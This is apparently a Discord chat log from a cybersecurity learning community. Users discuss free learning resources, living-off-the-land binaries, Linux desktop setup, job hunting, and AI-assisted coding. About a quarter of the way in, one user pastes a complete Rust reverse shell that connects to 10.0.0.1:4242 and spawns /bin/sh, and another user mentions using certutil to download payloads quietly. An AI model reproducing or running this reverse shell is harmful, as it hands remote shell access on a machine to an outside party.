#general
1 messages Ā· Page 863 of 1
sudo hacker spotted
Hi I'm trying to fuzz iot protocols for getting into security research.I don't have any experience in security research but know my way around networks and security (seedlabs,exploitedu).I don'tknow how to fuzz protocols to find vulnerability, how do I approach this as a research topic? My approach wos just read papers but that isn't getting me anywhere.Also what are the prospects in fuzzing research like what can I research by fuzzing iot protocols ,what are possible research areas , what is the chance of me finding a vulnerability using fuzzing approach and what can I infer as research worthy conclusions
Good night dude
~$ exit
I see bell peppers in chat š§āāļø
What is that face
That is the face of a creature that has never experienced genuine joy
a sandwich with sudo privileges
I've been lacking on THM as of late ngl
its ok,
Great job , seems like you're on a streak today š
Waiting on bro to finish that thought
Ah you're returned.
Sloboda is The Returned
yep
Can you please DM Jabba?
If he hasn't reached out to you.
7 hearts, damn i am popular around here
I missed the whole context of why you left, just that you had.
Particularly caustic chatters, tldr
Is this for school/college/uni?
Ssean was banned.
well tldr is i cant handle amount of brainrot this chat can produce sometimes and all trolls being left with slap on the wrist
thats basically it
I must have not been here in a while
man just needs to chill sometimes
It comes and it goes depending on time of day and who all is around lol
Ah, that would be why Jabba would you like you to reach out.
i neither want or can to stay in unproductive place where there is drama 90% of the time
But yeah Iām here for the actual intelligent discussions which Iām quite happy to have here
me too
thats why i didnt want to perma leave
i met some great people here
Yeah. I've also met some right roasters.
I think that's a consensus a lot of the chat has reached. When THM chat is nice it's nice, but it has high highs and looooooow lows

Oops, that's my Scottish showing.
just had some nice pulled pork, also a good roast
Being annoying should be a bannable offense
I personally think gif spam is annoying as heck, but we still want Berry around
no, being dick should be
Not sure about bannable. Maybe the guidelines on muting should be broadened a little bit to include some of the blatant cases, but that's not for me to decide
Thatās low key a rule in most communities, although phrased a bit more tactfully lol
Just allow people to be.
man this website is paid :(
not enforced enough in my opinion
The problem is this is an educational environment.
Some people do not understand what behaviour is appropriate
Itās not fully paid.
Nah laissez-faire moderation doesnāt work lol
The majority of the content is free.
Avoid the learning paths, go via the other content
i know but i cant continue in some lessons because some of the rooms are paid
oh okay
i understand wording is different but i just am not able to find any nicer words that can better express how i feel about certain types of people
You can filter in the search for just free rooms and more, the room search is very powerful
thank you
but I will say, imho a sub is worth it, if it is viable for you to do so
i dont have money im a minor
I got into THM to brush up on infosec after landing a position and itās been invaluable teaching me many topics and tools I use daily at work
totally fair
i sometimes log on THM to learn some stuff, school takes a lot of my free time
so getting a sub isnt worth it if i cant log on that often
mhmm, still hundreds and hundreds of free rooms off the beaten path
Iād say a majority of TMHās content in total isnāt actually listed in current learning paths anymore for one reason or another
Thereās also hundreds of free resources outside of thm to learn on too
You could honestly probably learn cybersecurity without paying a dime
paths are paid, but most of the ctf rooms are free
really? like what?
HackTricks Book site is fantastic
shout out to pwn college
Portswigger academy is a good place to learn web pentesting
Probably one of the best.
Hacker recipes too
šš
Been a god send for AD ctfs
Especially hackricks
Hacktricks, lolbas and gtfobins are probably my most 3 vistited sites for resources
Ive been slowly reading on gtfo
wow
PayloadAllTheThings is a great cheatsheet as well: https://swisskyrepo.github.io/PayloadsAllTheThings/
whats with the binaries?
revshell is nice too
Wdym what is it with the binaries?
Gotta lock in today and complete 20 rooms so I can get to 0xD
like what are those?
lolbabs and gtfobins are for exploiting common system software for evasion and more
Programs basically
lolbabs are for Windows ant gtfobins are for Linux
No worries, thatās what THM is here for!
They're great for living off the land too.
mhmm
I always read gtfobins as a swear
Youāre significantly more sealthy if you use built in system software for exploits and etc
you got this
hm, well i cant wait to understand all of this stuff, it sounds really interesting
good luck
a simple but fun example, Windows certutil can be used to base64 encode/decode and download your payload in a sneaky way
Despite being designed just to handle certificate management on Windows Server
i dont want to be mean youre really helpful but i dont know what youre talking about this is too advanced for mešš
Youāll get there
No worries, THM even has rooms on this and similar
you will understand in no time no worries
logs that connect to shells are very obvious if not encoded to blue team people
but yeah lolbabs shows you how common built in software can be abused like this
as referenced above, itās called āLiving off the Landā since youāre just using the software thatās already on your target machine
^ This could be helpful in an AD setup
Just you wait, if you keep at this long enough and Microsoft defender starts detecting your own Markdown note files for the reverse shells and other common exploits, then youāre doing it right lol
Speaking of AD but thinking from defender/blue team perspective, PingCastle and PurpleKnight are fantastic software packages for auditing your AD security. Also used for offensive purposes in real threat actor campaigns, despite how noisy they are

Actually thinking of that, I need to run PingCastle on our new clientās AD infra to see how that stacks up on Monday
good luck
Iāve seen some horrors uncovered in the past like service account tied Domain Administrator back in Server 2003 which would have allowed for easy escalation had I not wiped that connection out
I need to read more about active directory stuff as i did the module but was still super confused
I canāt remember what the word for that is, just bringing that up off the top of my head
š§ š„
spotted the iOS user c:
Thanks for asking good , how about you š ?
Gave +1 Rep to @fiery imp (current: #606 - 9)
I'm good mate
@sick lance please see above
Glad to hear that š 
Done!
Danke!
Thanks š
Gave +1 Rep to @sinful moon (current: #34 - 280)
Just did this room on thm
https://tryhackme.com/room/dailybugle
When one appears, I'm expecting more.
Old but gold š .
Yet again a reminder that if you donāt feel like removing the embed after the fact, you can encapsulate links with < > to remove the embed
Yeah
ohh..my bad. I'll do that
Would be cool if THM embeds actually showed room info tho
Yeha no worries, Iām just being anal since it takes up so much room lol
Ty for letting me know!
Gave +1 Rep to @sinful moon (current: #34 - 281)
btw i tried the ssh proxy you mentioned when you talked about your arch box
Anyways back to my point, I do hate how iOS keyboard doesnāt actually use the true ` backtick in its keyboard in an effort to be typographically correct
Although laughs on iPad with logitech physical keyboard where I can do proper nmap style backticks all day long
Although that brings me around to my next complaint, itās been years now Discord, when will mobile get code block syntax highlighting?
Itās especially silly on iPads where this looks like the full desktop interface for Discord, but still canāt do some niche Desktop features like that due to a completely different software stack
you can see this with pretty formatting on Desktop, and I can create this via mobile, but I canāt see the syntax highlighted result lol
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};
fn main() {
let s = TcpStream::connect("10.0.0.1:4242").unwrap();
let fd = s.as_raw_fd();
Command::new("/bin/sh")
.arg("-i")
.stdin(unsafe { Stdio::from_raw_fd(fd) })
.stdout(unsafe { Stdio::from_raw_fd(fd) })
.stderr(unsafe { Stdio::from_raw_fd(fd) })
.spawn()
.unwrap()
.wait()
.unwrap();
}
for all the mobile users
lol thank you, like I even set it up to do that but I couldnāt see the pretty results without another machine
(Just a Rust reverse shell since I still had PayloadAllTheThings open from ealier)
Ouch using unsafe on Rust but itās understandable in this case
Oh yeah, how did that work out? Probably just fine Iād gather
My mobile device is clearly superior
nice sideloading bro lol
lmao I'm not
what did they actually add it to react on Android only?
I think it's iOs that doesn't do code blocks as pretty as Android
For years and years Android couldnāt either
so that must have changed in the two years since I switched
Trust me if I were to be side-loading it I wouldn't post it publicly on here
I remember telling you this š
worked out surprisingly well ngl, workflow got a lot more easier ngl
Yeah I just use aliases to automate it and call it a day, itās lovely
since i dont have to switch from vm to host every 10 minutes
mhmm
my VM doesnāt even have a graphical display so itās invaluable to ssh tunnel either web traffic or RDP traffic locally
kvm vms are pretty seamless but its lot nicer when i can just use terminal on host with tmux
mhmm, I do love me some qemu/kvm, with Proxmox being my current home lab virtualization host
mhmm, I typically do this on my side work from home Mac Mini and it just werks once Burp and Microsoft RDP is setup
I wish Remenemia RDP client or however you spell it was avaliable on Mac though
so freaking good on Linux
although i am a bit sad because caido has some issues with remote dns
"Remenemia" š
lol an attempt was made
It's such a stupid word for a tool.
I don't know who many times I give two n and two m's
i couldnt find proxy option in remmina due to skill issues š
I ended up just creating an alias š
but i found xfreerdp has proxy option
Itās the same way as youāre doing now, once you set up the ssh tunnel for RDP traffic, just tell it to target 127.0.0.1:13389 or whatever
i just do this
you donāt need that feature built in, I literally just use the Microsoft RDP client on macOS to do this
I also stuck it in the panel
i run headless as of right now
my third line there
you have to edit the 11.11.11.11 with your target IP each time
with 10.10.10.10 being your attack machine/VM
xfreerdp /v:10.129.201.55 /u:htb-student /p:HTB_@cademy_stdnt! /proxy:socks5://127.0.0.1:9050 /f
i just do this for now
works fine
mhmm that is for sure another way to do it, but this works with all RDP solutions under the sun
and as for proxy i do this
alias kaliprox="ssh -i ~/.ssh/kali -D 9050 -q -C -N styx@kali -f"
Oh Iām sure you can but laughs at Mountian Lion era and basic GTK2 UI there

Your words, not mine. š
mhmm lol
But yeah I will say macOS makes for a fantastic *nix and infosec companion in my work from home setup. I have it on our personal network instead of the work network so I can verify firewall rules and more in a completely unconstrained/not allow listed enviroment
Although lol 95% of that is just sshing into my real Linux pentesting server anyways
also one big thing that this helped me with is being able to reduce amount of resources that i need for vm
but yeah I set up a similar Virtual Private Server at work for OpenVAS vuln scanning of our clients which isnāt allow listed at all
mhmm headless Linux VMs and servers are just love
I do hope youāre using our lord and savior tmux when youāre working on these
but i still gave it 8 cores š
lolol
of course
cant live without tmux
Yeah I over provisioned my first VPS for pentesting, I think 4 cores and 2GB of RAM or so, but still love it
8 cores just for the memes and 4GB of ram
since i decided mid installation i will do headless
actually I can check via my last screenshot of it
Yeah I was correct there
my tmux setup at the bottom there
How do you get this terminal frame thingy, by the way?
mine is default with just changed color
I see these screenshots all the time and I always wonder how to.
frame thing? That is just tmux?
thats mac i think
Including the window menu with the buttons at the top?
Ah, fair.
Oh if you mean the alpha transparency in the png thatās just via built in Screenshot utility in macOS
Prolly just a window screenshot then.
mhmm
is tmux status transparent or black
iirc I set it to black or none. I ported my classic .screenrc theme by hand
Man, I fully committed my Desktop to Arch today, and while everything works as intended, I am missing UTF-8 icons again, arghghgh.
noto-font and noto-fonts-emoji, optionally noto-fonts-cjk if you run into eastern languages tons
Then just use noto-fonts as system UI and call it a day tbh
only issue i have with it is this
Already got all of nerd-fonts installed, want to go for font-awesome as well. That should cover everything.
when terminal sometimes goes whack
But do I install ttf-font-awesome or otf-font-awesome?
and status doesnt sit perfectly at the bottom
ttf is fine, otf vs ttf is kind of up to you
TTF is more well supported by all OSes, OTF is more open but limited support
Yea, reading up on the difference right now.
for Linux it more or less doesnāt matter
OTF it is.
mhmm totally fair
If it breaks Imma just swap it.
Thanks for the input tho. ^_^
Gave +1 Rep to @sinful moon (current: #34 - 282)
but do install something that covers most of UTF-8 and best canidate for that is Google Noto fonts
mhmm np!
whew
I do think I already got you beat on that. 
Dunno how large the nerd font collection is, but I just installed the entire package group.
Even when Iām in my graphic design obsesions (nearly went into it) I never had that many fonts
Also Fira Code, best coding font.
But yes typography and the theory, design, and tech behind it are things Iām a huge nerd for
I use Hack which is very similar to Fira Code
But yeah I prefer Hack due to some changes and more vs Fira Code
thatās barely scratching the surface even in Arch
But does that do the cool thing where it turns -> into a single character arrow and != into a crossed out =?
we call those programming ligatures
This is why I like Fira Code.
I started Linux itās not so difficult right?
I personally donāt like them because they are less clear than the literal characters
Naa, you'll be perfectly fine.
Just be prepared to learn as you would with any new OS, and best way to learn is just using it
Fair, I suppose, different taste. The great thing is that nobody qho does not also use a font like that will see the recoded characters.
i like tall letters
when you have a question, just google it, thereās thousands of results for any question you will have
I see it has the same features.
idk how to describe it
Perfect
Can you gimme a screenshot?
all nerdfonts do
Ask a lot of questions.
I used to swear by the bitmap font Profont which is just lovely, but with resolutions increasing and UTF-8 getting more important I finally made the switch to TTF about a decade ago
its not tall but idk how to describe it
so so so much has changed even just in the 18 years of Linux use Iāve had alone
I started out with sys v init and HAL, urxvt, screen, archfetch.sh, kernel 2.6.26, ALSA instead of Pulse or PipeWire, etc etc
vim instead of neovim, a lot of these I had to be convinced āfine, itās finally time for me to changeā other upgrades I was excited about
That's why I asked you to show it. 
PipeWire I adopted as soon as it was made standard in Fedora, frick PulseAudio
kernel 2.6
That's fine, IoT stuff still uses that lol
Pulseaudio works for me, I suppose.
Literally no reason not to use PipeWire since itās a drop in replacement
More familiar with its CLI controls.
jut with lower latency and better fundimentals
PipeWire 
Argh, ok, sure, I'll look at it.
Nice, yeah I highly recommend it
Plus itās how Wayland screen recording permissions work and more
yes thereās similar terminal UIs as before
or yes just raw things you can use for keybinds
Not looking for TUIs.
you can even use the same pulse commands probably and it will respond, Iād wager at least
Hmm, doubtful.
you can use Pulse UIs with PipeWire without the app knowing the difference
pactl seems like a very PulseAudio specific thingamajig. xD
Wait, you can?
Wild.
I see, I see.
# audio controls
binde = ,XF86AudioLowerVolume,exec, pactl set-sink-volume @DEFAULT_SINK@ -1000
binde = ,XF86AudioRaiseVolume,exec, pactl set-sink-volume @DEFAULT_SINK@ +1000
bind = ,XF86AudioMute,exec, pactl set-sink-mute @DEFAULT_SINK@ toggle
bind = ,XF86AudioMicMute,exec, pactl set-source-mute @DEFAULT_SOURCE@ toggle
this works for me
Well, that is awfully convenient.
as long as itās all client side Pulse stuff, it works with pipewire
Ah cool, I got more or less the same setup.
One moment, Imma just swap it out and see whether everythng still works.
lol inb4 everything breaks, but it historically hasnāt for me
just make sure to follow Arch Wiki PipeWire guide when doing so
Guess I'm not disableling it?
thatās a common issue due to the symlinks iirc
Well, there is, but according to everyone around me, there is a better way to have sound. xD
@Bit
# Fn keys
bind = , XF86MonBrightnessUp, exec, brightnessctl -q s +5% # Increase brightness by 5%
bind = , XF86MonBrightnessDown, exec, brightnessctl -q s 5%- # Reduce brightness by 5%
bind = , XF86AudioRaiseVolume, exec, pactl set-sink-volume @DEFAULT_SINK@ +5% # Increase volume by 5%
bind = , XF86AudioLowerVolume, exec, pactl set-sink-volume @DEFAULT_SINK@ -5% # Reduce volume by 5%
bind = , XF86AudioMute, exec, wpctl set-mute @DEFAULT_AUDIO_SINK@ toggle # Toggle mute
bind = , XF86AudioPlay, exec, playerctl play-pause # Audio play pause
bind = , XF86AudioPause, exec, playerctl pause # Audio pause
bind = , XF86AudioNext, exec, playerctl next # Audio next
bind = , XF86AudioPrev, exec, playerctl previous # Audio previous
bind = , XF86AudioMicMute, exec, pactl set-source-mute @DEFAULT_SOURCE@ toggle # Toggle microphone
bind = , XF86Calculator, exec, ~/.config/ml4w/settings/calculator.sh # Open calculator
bind = , XF86Lock, exec, hyprlock # Open screenlock
bind = , XF86Tools, exec, alacritty --class dotfiles-floating -e ~/.config/ml4w/apps/ML4W_Dotfiles_Settings-x86_64.AppImage # Open ML4W Dotfiles Settings app
bind = , code:238, exec, brightnessctl -d smc::kbd_backlight s 5+
bind = , code:237, exec, brightnessctl -d smc::kbd_backlight s 5-
lol pipewire probably got pulled for something else as a dep
Thanks to you as well, my current set of keybinds already works.
Gave +1 Rep to @loud marlin (current: #25 - 389)
^_^
Meanwhile Iāve gotten less cool and just configure my keybinds in my DE
Still sort of want to disable the pulseaudio daemon to see what happens.
just lol do consult the wiki to prevent breakage as I mentioned
But I cannot because I don't know it's damn name, whahaha.
they should have info for dealing with existing Pulse
Wiki is a good call.
Thanks guys
Gave +1 Rep to @rugged kayak (current: #213 - 36)
Sorry i was eating
if you disable one. you need first to tell what of that two to use as default before disable one
Right, the daemon runs in userspace.
systemctl --user stop pulseaudio did the trick.
ay my rep was saved nice
yep there you go and that makes sense
lol thinking of my ancient Arch history lets see if I can find that screenshot
lol there we go, Openbox and Arch back in 2008
itās because itās on a 1600x1200 4:3 screen on a Dell laptop from 2002
which is a crazy high res for the era
even in 2008 tbh
hi elizabeth
heya!
how ya doing
Pretty well, enjoying a lazy sunday chatting here and having rain white noise via iOS accessability features
If anyone didnāt know, this is built into iOS and macOS, and you can put a hearing accessibility option in control center for easy access:
cool i didnt know!
Yeah kinda killer hidden feature
Yep, literally drop in replacement, glad to hear it!
Just gotta add that to my ansible setup thingy now.... Urgh.
everything that references ALSA, PulseAudio or JACK APIs will now be interacting with PipeWire transparently instead
When I choose pipewire during archinstall, will it still ship with pactl?
good afternoon
Good afternoon.
I donāt think so but you can install pactl on its own anyways I believe
Well....
Not really, maybe from the AUR?
I don't like the AUR.
Wonder what the corresponding tool for pipewire is, might as well fully commit at this point.
Yeah just read the wiki tbh
but psh not liking the AUR makes you slightly unhinged
I can understand it for this specific case but whew
Thatās like part of the whole appeal of Arch
I was an AUR maintainer for multiple packages for years
I think it's cool what sort of stuff you can install from there very easily, but I have trust issues regarding the security of the packages. xD
Ok, wiki also says pactl. Guess they are not replacing that part of the setup.
thatās why you always read the PKGBUILDs which solutions like yay/paru force you to
mhmm thatās my current solution. Iām loosely an acquaintance with the dev
This is taking longer than I expected
I will be honest though, Iāve used so many AUR helpers over the years as times change I just have an alias for update lol
I do that as well.
search and pinstall (had to, because install is a command already), and update and so on. xD
Congrats! You can force the update to happen on Discord by re-registering your Discord to THM verification
Otherwise, just wait a day
you need 900 i need 6000 for next level 
Hey hacker pals uwu
I still need about 800 points
hello hello

How're we
Ah yeah I mistread that
I am missing like 20k, it does not get any better.
The scariest jump is the next one, from 20 to 35
That will take a bit
Maybe someday the roles higher than 0xD will actually have their own colors
How has chat been the past few days?
Alive, wby ?
we are waiting for admins to invent new colors
Anyways, just got this cool looking new game, so I will be playing that now.
Thanks for your help. 
Same as it always has been lol
we are free from the ssean menace
no regrets there lol
Currently, they are all green. And also don't have access to the advanced channels.
I swap between rage and moroseness
it was great if you ask me š
What happened?
idk i wasnt there
Wahoo
If youāve seen their interactions it only takes a tiny bit of imagination to understand how lol
part of me wishes i could see what broke the camels back but i shouldnt be this drama addicted
I think I was there for day one where they instantly stood up for a nazi troll right after they joined, and couldnāt actually defend their point beyond āfree speechā lol. Discord is not free speech yo
Hello! Did you know that AI can analyze video like a human ex. basketball match and send information about it to user?
lol yea should have been banned first day
Many such cases š
Hellllloooooo chat!
are you a real person
Iād agree, but I can at least say that I can understand the moderators wanting to at least give them a chance
Any dropped wallets?
Hey, we should allow hate speech in a privately owned platform cuz uh ... My rights!
i carry everything on my purse
I don't have any money leave me alone
Awh man :(
free speech, doesn't mean free of consequences š š
Good thing those people arenāt in a place of power in the US government
Yuh
Hey lieutenant Kim, how are you?
I have some uh, bad news tho, @fallen burrow
I know I know š¦
couldnt sleep this night so im laying low for today
yupp š just asking
As a detective I don't sleep
Wanna do ctfs?
Meanwhile poor Ensign Harry Kim never progressed in his role in seven years on a starship
I live off of Alani and boiling showers.
the long arm of the law š
Oh and vape juice.
Oh I do PI OSINT type stuff, I'm not a LEO
which room?
You got mail
If youāre serious, thatās really neat
U like osint?
Yuh. I help people find things.
It's not super glamorous and all above board.
It makes me feel like I'm big brain
lol one of the things the Noir in my name is for is for Film Noir so no complaints
i havent done anything on phishing though
Say potatoe.
I have a cool jacket for it too.
Wanna try my osint room then?
Canāt be a PI without a badass trench coat and etc
"Say Potato, Elizabeth"
Neither have I!
Let's suffer together
@sinful moon
ok then
Sure I can try it when I get to studying TN or tomorrow
But rn i am making food
Nice nice!
sure i gotta finish the episode im wwatching too
My mom found it at a goodwill and I looked up the brand and it's website is sketch lmao
0i, I said potatoe.
Potato Potato, same difference
I gotta run a self defense class for my fellow gays then make some dinner.
So I may try the osint room later
Itās pronounced potato tho
Patatoh
I have really low motivation seeing that there are no job offers for juniors in cybersec of any kind be it pentest, SoC or Security Engineer. How can I motivate myself? Any ideas?
what got you into this field in the first place
SAY POTATOE
Kk, one sec
whew just got a flash back to the mid 00s Flash vibes: https://youtu.be/ihMMw0rnKz4
by etM http://www.albinoblacksheep.com/flash/taters
Potatoes. Boil 'em, mash 'em, stick 'em in a stew.
What we need is a few good taters.
Lord of the Rings remixed.
I was doing it in the job I was laid off from but it was only basic stuff like threat modelling, risk registry maintaining and sla maintaining
If that was question for me
yep i asked you, but i asked you this so you could reflect on yourself why you even started and find that spark that got you into this field in the first place
May want to try #cyber-and-careers though as this will probably get buried
Well I like cybersec but after 3 years of tedious paperwork I see that no one wants to hire me as I have zero experience so my motivation is hitting the ground right now. Second month and no job offers to apply for.
i dont want to discourage you but cyber is not entry level field, you need at least some experience in IT
Tried, it's basically dead
I would highly agree with that
I have some experience in IT
most SoC jobs require at least 1-2 years of experience, pentester is also mid-senior level position
Help Desk is often looked down on but itās highly valuable experience. Swift On Security constantly talks about how he started in Help Desk and how it informs and helps him in his infosec roles
Away back and make your tea in the microwave.
Cool but how an you gain experience if no one want's to hire you to gain such experience?
you know the drill
helpdesk mainly
Again you find those entry level jobs, but it sounds like you already have some experience under your belt
but either way it can help to just get your foot in the door
There are no entry level jobs there are only mid-senior as mentioned above
I very rapidly went from help desk to infosec and sysadmin after I proved myself at my current job
Smaller orgs can also help
This exactly
Iām at a very small org which kind of means you get to do it all, and looks amazing on your resmume, but be careful not to bite off more than you can chew
Windows sysadmin, Linux sysadmin, infosec everything, compliance management, devops, etc, I kind of do it all
I have worked as software tester for 2 years, programmer for 2 years, devops for 1 year and pseudo cyber sec for 3 years. No one wants to hire me.
I am literally the SOC manager⦠but lol our SOC is outsourced anyways
Iām just the final stop for that
yea job hunging can take quite a while
Set your expectations lower and get your foot in the door before advancing up the ranks if possible. Two months is also a low timescale with how bad the market is right now
i just applied for devops internship, do you have any advice for me if i get the interview or a job even
I've been trying to get security engineer and SoC and nothing. I just started learnign pentesting so I do not even try for such positions not to make a fool of myself,
Learn azure, aws, git if you can in your job.
mhmm
also docker and kubernetes
git i know well, i have some experience with docker and setting up linode instances
It is magical when boss is like āuh I need a single server serving three legacy web clients, can you do thatā, two days later I have a Docker Compose config just for that
try to automate as much as you can but test it out not to mess up and do not tell anyone you did automate your job
docker compose is goated
Use Copilot AI
i have script that installs my arch dotfiles š
There are programs that already do the same thing, but fair enough
It's not a bad idea. I use ai a lot but doublecheck what it returns. It really helps to rapid prototype scripts
You canāt hide from the future man @sinful moon

Future man required checking behind him to make sure his work is correct
like asking an intern to code something up for you
Itās more about getting tasks done quicker, and spending less time on repetitive tasks
this ^
Not getting it to do work you donāt understand how to do lol
ai makes easy tasks easier and hard tasks much more harder
Just god forbid if you donāt notice a vulnerability thatās being entered into the codebase over a simple āwell I didnāt actually code this myselfā
dont use ai for coding or you will start to suffer from skill issues pretty fast
As an industry professional who doesnāt rely on AI, you should easily be able to spot when AI makes a mistake
i tried copilot and i was getting work done a lot slower and it just started annoying me and getting in my way
people want to write code, not do code reviews of garbage that ai produced
Yeah while it can give you solution, Iād just re-code them yourself under more ideal circumstances
People can use AI just fine IF they understand the code that it returns and know what it does. For me asking AI to write to do something in python and then fixing issues if it does not work and sometimes optimizing it is easier than wasting 4 hours to search for libraries or scroll throught documentations.
Why do you assume AI can only be used for generating code? š
bro u started talking about copilot first
āwhatās wrong with my codeā is a far way off from ācode this for meā
i did not assume, its currently its most common use case
and i am speaking as developer therefore i will talk about ai and coding
But it also helps to understand what is wrong with the code too.
yes I was speaking in support of such
i say if you cant read code you have skill issues
but that is just me
try to feed ai with random java 50 lines exception it will explain it to you like you are five
Realistically we are just not there yet imho
it can be a helpful tool, but needs mountains of human oversight or things go wrong quick
Can also run afoul of open source licensed code and more it was trained on, sometimes used verbatim
Lmao what? Again, itās a tool, not a replacement. Idk about you but Iām all for a tool that can speed up both development and learning
asking ai to analyze you a piece of code is you avoiding learning
i really dont want to use it so i dont end up addicted
ai makes mistakes
Meanwhile I personally see it as a handycap where people are just accepting the results with a quick once over and commiting
reading code is necessary skill
Not a reason not to use it. Not all sources on the internet are true š¤·š½āāļø
i am not speaking from internets sources i am speaking from my experience
Thatās true but typically people are being more skeptical about these posts than AI āmagicā
for example i had to fix a feature on some golang framework with text wrapping
No it's not
i asked gpt and it gave me bullshit
^
i had to read the code to understand it
No I will disagree there, āwhats wrong with my codeā is a much better use of AI then āgenerate some code for meā
It's not all black and white guys
ai is simpy a tool, doesnt mean its a good one
Some of the top fortune 500 companies are using AI to help their development teams analyse code
Yes Microsoft claims that 30% of their code is now AI generated that thatās terrifying lol
Enron was fortune 500
Look what happened to them.
indeed lol
sloboda might've had a bad experience with ai, I can tell
imho no matter which way you stand, itās healthy to bring some skepticism and critical thinking into the mix
Hold on. Ai is thinking up a response for me
Yes Adobe Illustrator is quite neat lol
i mean look at the whole devin scam
I donāt think you can blame AI for the downfall of a company lol
6 months old startup worth over 2 billion
Why not?
(you didnāt capitalize the I, and traditionally Ai is adobe)
not yet maybe
I wasn't, funnily enough that was 2001 or so...
It's a point about Fortune 500.
you blame the greed c-suite for firing the working force
ai is cheaper than devs
if you fire dev over ai you deserve to fail
For example here https://www.perplexity.ai/search/explain-this-code-to-me-interf-tYfjBg3TQb6x8AlyNOzBvQ#0 AI can help someone to understand code by explaining what it does and how it does it.
Or you buy the team copilot licenses for the devs to support them and retain them as loyal employees š¤
Difference is what you take from the output.
Honestly AI for uses like that are just a fancy search engine and should be treated as scuh
idk about yall but I don't like the word "AI"
With a copilot license?
mhmm, LLM is much more descriptive
yea like i said, grow addicted to it and wont be able to code without
damn that share button is broken again, fixed the link
If they use it effectively, they will save themselves time, have more of an impact, contribute to the companyās success
yeah, that's the same reason i don't chat gpty
While LLM are helpful, it can also cheat yourself out of the critical thinking and problem solving required for a task
Yeah that is a concern, people are becoming reliant on AI too
Just like on THM, why cheat answers, youāre cheating yourself out of the education
you cant effectively use chainsaw for job that requires a scalpel
this is what i am saying too
sometimes you need to chop down a tree before carving a toothpick
On the flip side, yes AI/LLM is helpful and can be a game changer to some, but you need to read it as if your dumb intern wrote it
I'm such a great poet
Me too
When it works.
I hate Google's integration of AI, if I listened to it, it would have killed me with electrical safety misinformation.
code analysis for exmaple, i will just spit you out the answer you need
you didnt do any work
You can use -ai when googling to hide the AI response iirc
tell it to do otherwise
It's just a tool. Tools are made to make works easier. Would you say a farmer cheats because he uses a tractor instead a plow?
yes
Literally this
Thatās not a great analogy at all
Itās not great itās the greatest
i do sometimes use it to explain me what some code does though
Thatās like saying that if youāre not using AI to āplow your fieldsā youāre backwards and doing it wrong
not great, not terrible
I've lived through the crypto fad.
This too shall pass.
indeed, we all have
Both times, Nvidia selling the shovels...
suprised people havenāt learned from NFT and crypto era
@wooden totem Our backups are safe, it isnāt a dream. Immutable backups, backed up by Veeam
Or even better. People shouldn't use Visual Studio, IntelliJ or any kind of IDE because it is cheating. They should use notepad or vi to code. Automatic suggestions? lint? Cheating!
thats just a hype train, it happened millions of times throughout history
Oh god crypto
I will say that at least AI has some small tangable benefit in comparison to the above though
Don't bring that shit storm back 
but this is nothing new
look back at mid 80s episodes of The Computer Chronicles and itās AI this and AI that
Ai can be useful, where it's used in Hospitals and such.
Or anywhere
But it's been used there long before it was used for code.
yup totally, beep boop thingamabob works yes, excellent
AI sure didnāt change the world in the 80s and it remains to be seen if it impacts things meaningfully now other than bad code
Thereās no doubt as to why millions of companies and individuals are adopting AI, and why itās already becoming integrated with some of the worldās leading tech.
Because it's the latest fad.
hype is why
No itās not
AI addicts when they gotta think for themselves š±
helps their profit margin and stock market valuation
Hyprland workspace management is kinda cringe, not gonna lie.
Did Apple of Microsoft release a software update when NFTs were popular?
saying you use AI is the key to boost your market valuation in the stock market
No but game companies sure did
and fell flat on their face
lol
No because NFT's were shit
Itās a $196 billion industry
just like the metaverse was
AI at lest as the potential for something, but weāre not there yet
every time someone copy and pastes code from ai without knowing what it does, an angel loses their wings
Except it did. Google R1 at Digital Equipment Corporation and XCON
Ai creates lazy students,.who carry that out from beyond their studies.
Those were decision making applications and nothing like the AI weāre familiar with today
If you know how market caps are actually calculated, you would know that this is a lot of hot air.
it was considered AI at that times and they were created while working on AI
Seems to be a lot of bias towards AI preventing learning and cheating. AI also helps to save lives, prevent fraud, so many good things that arenāt being mentioned here
well that is true, AI has helped the medical field a lot
iirc the term was āexpert systemsā in the 80s because they were supposed to help you make decisions as if you had an AI expert on the team
its just as a student I see the laziness up front in my daily life
But realistically they were all pre-fed answers in a matrix of if;than;else statements
would a lab-created brain be counted as AI?
Ai used to detect brain anomalies is more useful than teaching somebody how to code, or write a report.
Can you elaborate?
Assuming youāre just fine tuning it, yes
And a significantly better use of tech thatās actually all about pattern recognition
lab grown brain, it thinks like a living thing, it's made of biological material and it has intelligence
Even still, these are used in a consensus process. Itās not making decisions
Apparently AI cannot manage your security š
Just like our own inteligence. Humans thousands years ago: Me monke me want eat and sleep. Humans now I do not need to explain do I?
More of an aid.
That is extremely reductive
But that is how it works
You have no idea how complex our brains were even then
something need to be primitive and bad to be slowly improved and get better. Nothing is created good or perfect in the first place
For example, think for a moment why humans can see more shades of green than any other color
evolution and specialization
we were adapted to see predators in the foliage from a primal level
Colours donāt exist, they are just a perception of the brain
and even that task alone is something AI dramatically struggles with, despite advanced in AI image recognition
Non-sequiturā¦
If we canāt even simulate something we do without thinking in early human evolution, we are nowhere close to this sorta thing
Different wave lengths exists. Color being a representation of said wavelengths. It still exists. But sure the words we attribute to colors are purely arbitrary
That is because we are stupid and cannot make it learn better. But there was that experiment some time ago I forgot how it was called. To make it short scientists created AI with primary objective of communicating and learning. At first they were able to see how it communicated with each other but later it got so good at it that the speed of communication was better than any human made algorithm. The only issue was that scientists were no longer able to see what data was sent and recieved because for humans it was gibberish trash. They got scared and axed the project just in case.
Created by the brain though
The brain isnāt creating anything unless you are meaning hallucinations
you could also say that colours were always there waiting to be seen
and lots of other colours exist that we cant see
Not sure what point you're trying to make it here tbh
Physical properties of light arenāt colour
No, the color representation happens due to the rod and cones in our eyes (which are processed upside down Iāll remind you, and our brain flip that right side up and interpurts the color signals we recieved from the eye)
Think they're just arguing for the sake of it at this point.
wut is all I have to say
wait how did the topic go to this
I donāt know lmao
true but it is not color this are wavelengths that are translated by brain to colors. There is no color per se.
imho itās always best to have a healthy skepticism about any new tech and to adopt it unquestionably is a mistake
I like debating about topics, I guess itās a way of learning
So, no color, but how is this relevant to the ai discussion? Did I miss something or was it always about the arbitrary representation of color
i just really want AI to fail so we dont all run out of jobs lol
It's quite an old experiment where they had two AIs communicate with the task of optimizing language.
And, well, the AI optimized the language to a point where nobody was able to understand it anymore.
Skepticism also doesnāt mean āignore facts you disagree withā it is how the scientific method works
But that was a couple years ago, lel.
But isnāt AI creating jobs?
I want it to suceed but at the same time not to lose job. AI is our only hope for survival.
